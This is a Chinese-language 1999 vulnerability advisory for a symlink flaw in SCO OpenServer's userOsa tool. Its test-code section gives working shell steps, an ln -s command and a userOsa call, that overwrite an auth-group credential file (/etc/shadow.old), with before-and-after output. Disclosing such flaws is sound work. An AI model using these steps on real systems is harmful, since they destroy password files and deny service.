SCO OpenServer的'userOsa'符号连接漏洞发布时间:1999-10-15 更新时间:1999-10-15 严重程度:中 威胁程度:本地拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 SCO Open Server 5.0.5 ;5.0.4;5.0.3;5.0.2;5.0.1;5.0详细描述 在某些SCO OpenServer中存在着符号连接漏洞,通过'auth'组能用来覆盖任何组可写文件。此问题存在于/etc/sysadm.d/bin/user0sa可执行文件中,此执行的输出将写入debug.log文件中,但程序本身不检查是否覆盖了一个已存在的文件或带有符号连接的文件。因此可以用 DUBUG数据来覆盖属于'auth'组的文件。而/etc/shadow & /etc/passwd也属于此类,所以恶意者可以更改这些文件使系统不能使用. 测试代码 scohack:/tmp$ ln -s /etc/shadow.old debug.log scohack:/tmp$ /etc/sysadm.d/bin/userOsa bah connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}} Failed to listen to client Failure in making connection to OSA. scohack:/tmp$ ----- 开始利用之前: scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old 利用之后 (注意字节的变化): scohack:/# l /etc/shadow.old -rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old scohack:/# cat /etc/shadow.old >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}) scohack:/# 解决方案 安装补丁 相关信息 |
